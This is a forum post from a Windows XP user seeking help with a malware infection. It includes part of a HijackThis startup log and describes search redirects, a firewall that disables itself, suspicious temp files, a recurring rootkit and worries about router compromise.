{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll (file missing) O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll (file missing) O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll (file missing) O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\System32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe O4 - HKLM\..\Run: [00THotkey] C:\WINDOWS\System32\00THotkey.exe O4 - HKLM\..\Run: [000StTHK] 000StTHK.exe O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe O4 - HKLM\..\Run: [TouchED] C:\Program Files\TOSHIBA\TouchED\TouchED.Exe O4 - HKLM\..\Run: [PadTouch] "C:\Program Files\TOSHIBA\PadTouch\PadExe.exe O4 - HKLM\..\Run: [TFNF5] TFNF5.exe O4 - HKLM\..\Run: [TPSMain] TPSMain.exe O4 - HKLM\..\Run: [TFncKy] TFncKy.exe O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE O4 - HKLM\..\RunOnce: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript O4 - HKCU\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe" O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe" O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ? O4 - Global Startup: Start GetRight.lnk = C:\Program Files\GetRight\GetRight.exe O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present O8 - Extra context menu item: Download with GetRight - C:\Program Files\GetRight\GRdownload.htm O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files\GetRight\GRbrowse.htm O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O14 - IERESET.INF: START_PAGE_URL=file:///C:\Program Files\TOSHIBA\Free Update Service\splash.html O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1238014490265 O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.6.0) - http://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jd...ows-i586-jc.cab O16 - DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} (HPSDDX Class) - http://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://crucial.com/controls/cpcScanner.cab O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe O23 - Service: Google Updater Service (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing) O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe -- End of file - 8371 bytes I will run the DDS program and post those logs separately after this post. Regards.

System information (Toshiba laptop PC, Windows XP Home, XP firewall, Internet Explorer 7, AVG 8.5 Free Edition, ZyXEL wired router) My PC has recently been attacked by one or more viruses. It started when I clicked on an apparently innocent forum page, a site which in the past has never posed a problem (not that I visit too often). I immediately received a notification that my XP firewall had been turned off. The hard disk started to get very busy and I knew something wasn't good. I immediately powered off my router to avoid further trouble but I guess by then it was too late. I went to do a System Restore but I noticed that all of my restore points had been deleted. At the time though, I could create new save points. I knew they would have been worthless as I had already been attacked but wanted to see if I could actually perform it. I rebooted the PC and saw straight away, upon running Internet Explorer, that my Google searches had been hijacked. Like many other people I have read about that have got infected recently, I was starting to get redirects to Cliccker.cn, among others. Over the course of time, the redirects seemed to grow in frequency, so the correct links became less and less common the first time I clicked on them. This wasn't the only problem though. My firewall defaulted to Off everytime I rebooted and sometimes switched itself off while the PC was running. I also noticed that the hard disk was gently and briefly accessed every ten seconds. It never did this before. I tried using a program called Process Explorer to see what was accessing the disk and while I don't know the program's functionality very well, what graphs to look at and so on, I did see that there was always exactly 13.5KB worth of data being accessed each time. As time went on, System Restore stopped working altogether. CheckDisk stopped working too. Later on I also saw, on bootup, an error saying there was a fault with Pad.exe (part of my laptop's functionality). I am guessing that without a mouse, I probably wasn't even able to scroll around and click on things. I also did a Windows file search to see what files had been created or modified on the day of the attack. I did catch two .tmp files. One was Serr.tmp and the other was Ocerxawmns.tmp (I can't remember if they started with capital letters). These were in the Temp folder (I'm afraid I cannot remember which one). I looked up these in Google (when it worked). Serr.tmp was listed as a nasty looking virus and with some symptoms that were similar to what I was getting. There wasn't a lot of returned searches on this file though so it seems funny that not a lot of information is available outside the first returned search entry. The second file I mentioned didn't come up in Google at all. I have also seen references to something called tmp.edb, which I cannot tell if it is a virus or not as webpages in Google couldn't give a confirmed answer. Therefore, I don't know exactly how many viruses I had or still have in my system and whether they are related. AVG detected nothing at all upon the attack and didn't even find anything wrong with Serr.tmp. I also ran Trend's online Housecall 7 Beta which found two trojans. These files were listed as 26C3.tmp (detected as TROJ GEN.0Z10 46) and ~TM27.tmp (TROJ BREDOLAB.EZ). However, it didn't find anything else after further searches and the symptoms continued. I posted these problems on another forum but never received a reply. During that time I discovered Malwarebytes and figured, that because of the state my PC was in, I had nothing to lose by trying it. It detected multiple viruses and managed to remove most of them. More viruses were discovered on a second scan. Since then I have got Google back under control and System Restore and CheckDisk are working again. XP's firewall stays up this time as well, although I am now finding I can't switch off warnings that I deliberately disabled Auto Updates for Windows. The save points are still gone. I'm still hearing that little bit of disk access every ten seconds as well (it is really irritating to hear because I can't stop it). I really don't know what is causing it but I don't like the sound of it. I am also seeing one persistent rootkit detected in the registry. It gets deleted but then returns everytime. Finally, I am very concerned that my router has been infected or that something has been altered. I cannot be certain of this but I have noticed that the DSL/Activity light is flickering a lot more often than normal, suggesting traffic. It is even doing this when my PC is switched off. It definitely appears to be more busy than before. I read some posts and articles recently that talked about a router's settings or even firmware being altered and it sounded frightening. Is there any way I can check to see if anything has been altered? I'm happy to reset my router to factory settings but if the firmware can get altered, I am guessing a reset won't even help? I have logs from the Malwarebytes program available and I also recently downloaded HijackThis. I won't post these until you request them though because this post is already long. Thank you in advance.